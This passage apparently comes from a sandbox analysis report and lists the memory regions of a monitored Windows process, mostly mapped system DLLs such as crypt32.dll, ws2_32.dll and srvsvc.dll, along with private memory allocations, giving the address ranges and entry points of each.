filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 2591
start_va = 0x7fefc6c0000
end_va = 0x7fefc6c9fff
monitored = 0
entry_point = 0x7fefc6c3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 2592
start_va = 0x7fefc7f0000
end_va = 0x7fefc836fff
monitored = 0
entry_point = 0x7fefc7f1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2593
start_va = 0x7fefc8e0000
end_va = 0x7fefc90ffff
monitored = 0
entry_point = 0x7fefc8e194c
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 2594
start_va = 0x7fefca80000
end_va = 0x7fefca86fff
monitored = 0
entry_point = 0x7fefca8142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 2595
start_va = 0x7fefca90000
end_va = 0x7fefcae4fff
monitored = 0
entry_point = 0x7fefca91054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 2596
start_va = 0x7fefcaf0000
end_va = 0x7fefcb07fff
monitored = 0
entry_point = 0x7fefcaf3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2597
start_va = 0x7fefcc00000
end_va = 0x7fefcc31fff
monitored = 0
entry_point = 0x7fefcc0144c
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 2598
start_va = 0x7fefccd0000
end_va = 0x7fefccfefff
monitored = 0
entry_point = 0x7fefccd1064
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 2599
start_va = 0x7fefcd10000
end_va = 0x7fefcd19fff
monitored = 0
entry_point = 0x7fefcd13b40
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 2600
start_va = 0x7fefcd20000
end_va = 0x7fefcd8cfff
monitored = 0
entry_point = 0x7fefcd21010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 2601
start_va = 0x7fefcfe0000
end_va = 0x7fefd002fff
monitored = 0
entry_point = 0x7fefcfe1198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 2602
start_va = 0x7fefd090000
end_va = 0x7fefd09afff
monitored = 0
entry_point = 0x7fefd091030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 2603
start_va = 0x7fefd0c0000
end_va = 0x7fefd0e4fff
monitored = 0
entry_point = 0x7fefd0c9658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2604
start_va = 0x7fefd0f0000
end_va = 0x7fefd0fefff
monitored = 0
entry_point = 0x7fefd0f1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2605
start_va = 0x7fefd100000
end_va = 0x7fefd190fff
monitored = 0
entry_point = 0x7fefd101440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 2606
start_va = 0x7fefd1a0000
end_va = 0x7fefd1dcfff
monitored = 0
entry_point = 0x7fefd1a18f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 2607
start_va = 0x7fefd1e0000
end_va = 0x7fefd1f3fff
monitored = 0
entry_point = 0x7fefd1e10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2608
start_va = 0x7fefd200000
end_va = 0x7fefd20efff
monitored = 0
entry_point = 0x7fefd2019b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2609
start_va = 0x7fefd2a0000
end_va = 0x7fefd2aefff
monitored = 0
entry_point = 0x7fefd2a1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2610
start_va = 0x7fefd2b0000
end_va = 0x7fefd2c9fff
monitored = 0
entry_point = 0x7fefd2b1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2611
start_va = 0x7fefd2d0000
end_va = 0x7fefd33bfff
monitored = 0
entry_point = 0x7fefd2d2780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2612
start_va = 0x7fefd3e0000
end_va = 0x7fefd415fff
monitored = 0
entry_point = 0x7fefd3e1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2613
start_va = 0x7fefd420000
end_va = 0x7fefd58cfff
monitored = 0
entry_point = 0x7fefd4210b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2614
start_va = 0x7fefd590000
end_va = 0x7fefd5cafff
monitored = 0
entry_point = 0x7fefd591324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 2615
start_va = 0x7fefd5d0000
end_va = 0x7fefd7d2fff
monitored = 0
entry_point = 0x7fefd5f3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2616
start_va = 0x7fefd860000
end_va = 0x7fefd8acfff
monitored = 0
entry_point = 0x7fefd861070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2617
start_va = 0x7fefd8b0000
end_va = 0x7fefd94efff
monitored = 0
entry_point = 0x7fefd8b25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2618
start_va = 0x7fefd950000
end_va = 0x7fefd9e8fff
monitored = 0
entry_point = 0x7fefd951c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2619
start_va = 0x7fefd9f0000
end_va = 0x7fefdaf8fff
monitored = 0
entry_point = 0x7fefd9f1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2620
start_va = 0x7fefdb00000
end_va = 0x7fefdcd6fff
monitored = 0
entry_point = 0x7fefdb01010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2621
start_va = 0x7fefdce0000
end_va = 0x7fefdda8fff
monitored = 0
entry_point = 0x7fefdd5a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2622
start_va = 0x7fefddb0000
end_va = 0x7fefeb37fff
monitored = 0
entry_point = 0x7fefde2cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2623
start_va = 0x7fefed60000
end_va = 0x7fefed6dfff
monitored = 0
entry_point = 0x7fefed61080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2624
start_va = 0x7fefed70000
end_va = 0x7fefed77fff
monitored = 0
entry_point = 0x7fefed71504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2625
start_va = 0x7feff130000
end_va = 0x7feff181fff
monitored = 0
entry_point = 0x7feff1310d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2626
start_va = 0x7feff190000
end_va = 0x7feff1aefff
monitored = 0
entry_point = 0x7feff1960e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2627
start_va = 0x7feff1b0000
end_va = 0x7feff1ddfff
monitored = 0
entry_point = 0x7feff1b1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2628
start_va = 0x7feff1e0000
end_va = 0x7feff246fff
monitored = 0
entry_point = 0x7feff1eb03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2629
start_va = 0x7feff250000
end_va = 0x7feff37cfff
monitored = 0
entry_point = 0x7feff29ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2630
start_va = 0x7feff380000
end_va = 0x7feff456fff
monitored = 0
entry_point = 0x7feff383274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2631
start_va = 0x7feff460000
end_va = 0x7feff53afff
monitored = 0
entry_point = 0x7feff480760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2632
start_va = 0x7feff540000
end_va = 0x7feff5b0fff
monitored = 0
entry_point = 0x7feff551e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2633
start_va = 0x7feff5d0000
end_va = 0x7feff5d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2634
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 2635
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 2636
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 2637
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 2638
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 2639
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 2640
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 2641
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 2642
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 2643
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 2644
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 2645
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 2646
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 2647
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 2648
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2649
start_va = 0x7fffffd4000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 2650
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2651
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2652
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2653
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2654
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2655
start_va = 0x1d10000
end_va = 0x1d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d10000"
filename = ""
Region:
id = 2656
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 2657
start_va = 0x9d0000
end_va = 0x9dffff
monitored = 0
entry_point = 0x9d3e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2658
start_va = 0x9e0000
end_va = 0x9e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2659
start_va = 0x9d0000
end_va = 0x9dffff
monitored = 0
entry_point = 0x9d3e64
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2660
start_va = 0x9e0000
end_va = 0x9e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2661
start_va = 0x7fef7f60000
end_va = 0x7fef804dfff
monitored = 0
entry_point = 0x7fef7f612a0
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 2701
start_va = 0x1c10000
end_va = 0x1c8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c10000"
filename = ""
Region:
id = 2702
start_va = 0x7fef7eb0000
end_va = 0x7fef7ee9fff
monitored = 0
entry_point = 0x7fef7ecd020
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 2703
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 2704
start_va = 0x7fef7e30000
end_va = 0x7fef7ea6fff
monitored = 0
entry_point = 0x7fef7e6e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 2713
start_va = 0x7fefcc50000
end_va = 0x7fefcc71fff
monitored = 0
entry_point = 0x7fefcc55d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2714
start_va = 0x1e50000
end_va = 0x1ecffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e50000"
filename = ""
Region:
id = 2715
start_va = 0x7fef7dc0000
end_va = 0x7fef7dfcfff
monitored = 0
entry_point = 0x7fef7dc1070
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 2716
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 2717
start_va = 0x7fefad30000
end_va = 0x7fefad56fff
monitored = 0
entry_point = 0x7fefad398bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2718
start_va = 0x7fefad20000
end_va = 0x7fefad2afff
monitored = 0
entry_point = 0x7fefad21198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2720
start_va = 0x7fef7d90000
end_va = 0x7fef7db4fff
monitored = 0
entry_point = 0x7fef7da8c54
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 2721
start_va = 0x1f40000
end_va = 0x1fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f40000"
filename = ""
Region:
id = 2722
start_va = 0x739c0000
end_va = 0x739c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll"
filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll")
Region:
id = 2723
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 2724
start_va = 0x7fef7cf0000
end_va = 0x7fef7d81fff
monitored = 0
entry_point = 0x7fef7d651ec
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 2725
start_va = 0x7fefc3d0000
end_va = 0x7fefc48afff
monitored = 0
entry_point = 0x7fefc3d6de0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 2726
start_va = 0x7fefaa90000
end_va = 0x7fefaae2fff
monitored = 0
entry_point = 0x7fefaa92b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 2727
start_va = 0x7fefb2b0000
end_va = 0x7fefb2c0fff
monitored = 0
entry_point = 0x7fefb2b14c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 2728
start_va = 0x7fef7c60000
end_va = 0x7fef7ca1fff
monitored = 0
entry_point = 0x7fef7c617e4
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 2729
start_va = 0x7fef7ac0000
end_va = 0x7fef7b06fff
monitored = 0
entry_point = 0x7fef7ac1040
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 2730
start_va = 0x1fc0000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fc0000"
filename = ""
Region:
id = 2731
start_va = 0x1020000
end_va = 0x106ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001020000"
filename = ""
Region:
id = 2732
start_va = 0x2130000
end_va = 0x231ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 2733
start_va = 0x1020000
end_va = 0x104ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll.mui"
filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui")
Region:
id = 2734
start_va = 0x1060000
end_va = 0x106ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001060000"
filename = ""
Region:
id = 2735
start_va = 0x2180000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 2736
start_va = 0x22a0000
end_va = 0x231ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022a0000"
filename = ""
Region:
id = 2737
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 2738
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2739
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2740
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2741
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2742
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2743
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2744
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2745
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2746
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2747
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2748
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2749
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2750
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2751
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2752
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2753
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2754
start_va = 0x9d0000
end_va = 0x9d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 2755
start_va = 0x7fef7990000
end_va = 0x7fef7997fff
monitored = 0
entry_point = 0x7fef7991020
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 2762
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 2763
start_va = 0x7fef78c0000
end_va = 0x7fef790ffff
monitored = 0
entry_point = 0x7fef78c1190
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 2764
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 2765
start_va = 0x7fefcd90000
end_va = 0x7fefcda3fff
monitored = 0
entry_point = 0x7fefcd94160
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 2766
start_va = 0x1f10000
end_va = 0x1f8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f10000"
filename = ""
Region:
id = 2767
start_va = 0x2200000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 2768
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 2769
start_va = 0x2320000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002320000"
filename = ""
Region:
id = 2770
start_va = 0x24b0000
end_va = 0x261ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024b0000"
filename = ""
Region:
id = 2771
start_va = 0x1f90000
end_va = 0x208ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f90000"
filename = ""
Region:
id = 2772
start_va = 0x2620000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002620000"
filename = ""
Region:
id = 2773
start_va = 0x7fef7390000
end_va = 0x7fef73a8fff
monitored = 0
entry_point = 0x7fef7391104
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 2774
start_va = 0x2360000
end_va = 0x23dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 2775
start_va = 0x2430000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 2776
start_va = 0x7fef7300000
end_va = 0x7fef7383fff
monitored = 0
entry_point = 0x7fef7351118
region_type = mapped_file
name = "netcfgx.dll"
filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")
Region:
id = 2777
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 2778
start_va = 0x18a0000
end_va = 0x192ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018a0000"
filename = ""
Region:
id = 2779
start_va = 0x2620000
end_va = 0x271ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002620000"
filename = ""
Region:
id = 2780
start_va = 0x2780000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2781
start_va = 0x7fef8400000
end_va = 0x7fef85affff
monitored = 0
entry_point = 0x7fef8401010
region_type = mapped_file
name = "vssapi.dll"
